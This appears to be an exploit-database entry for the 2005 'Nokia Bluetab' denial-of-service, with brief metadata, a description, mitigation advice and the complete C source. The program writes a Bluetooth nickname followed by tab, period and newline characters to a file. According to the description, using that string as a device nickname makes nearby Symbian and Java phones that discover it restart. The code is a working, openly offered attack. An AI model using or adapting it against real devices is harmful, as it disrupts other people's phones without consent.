Nokia Bluetab Exploit

vendor:

by:

Qnix

3.3

CVSS

LOW

Bluetooth vulnerability

200

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Symbian and Java mobile devices

2005

This exploit creates a file called bluetab.txt with the user's Bluetooth nickname. When the file is sent to a Nokia mobile device and the nickname is copied and pasted into the device's Bluetooth nickname, any mobile device that searches for and finds the nickname will restart. This exploit also works on many other Symbian and Java mobile devices.

Mitigation:

To mitigate this vulnerability, users should avoid opening or accepting files from unknown or untrusted sources. Additionally, keeping Bluetooth visibility to a minimum can reduce the risk of being targeted by this exploit.

Source

Exploit-DB raw data:

/*
      Nokia Bluetab Exploit 
      Found & coded by Qnix
 
 - This Exploit will creat file called bluetab.txt with your 
   bluetooth nickname, send the file to your nokia mobile
   open it copy the nickname and paste it to your bluetooth
   nickname, if any one search and find your nickname his
   mobile will restart .
 - this exploit work on many other symbian and java mobiles .

   Qnix - Qnix@bsdmail.org

*/

#include <stdio.h>
#define  tab1 0x09
#define  tab2 0x2E
#define  dot1 0x0A

int main(int argc,char *argv[])
{

 FILE *bluetab;

 if(argc < 2)
 { 
   msgm();
   printf("Useage : ./bluetab <nickname>\n");
   return 0;
 } 
 else
 { 
   msgm();
   printf("bluetab.txt file created with your nickname . \n");
 }
 
 bluetab = fopen("bluetab.txt","w");
 if(!bluetab)
 {
   msgm();  
   printf("Some kind of file error!\n");
   return 0;
 }

 
 fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1); 
 fclose(bluetab);
 return 0;
 
}

msgm()
{

  printf(" ------------------------------- \n");
  printf("     Nokia Bluetab Exploit       \n");
  printf("       found & coded by          \n");
  printf("       Qnix@bsdmail.org          \n");
  printf(" ------------------------------- \n\n");
}

/* v1 2005-03-04 milw0rm.com */

// milw0rm.com [2005-09-23]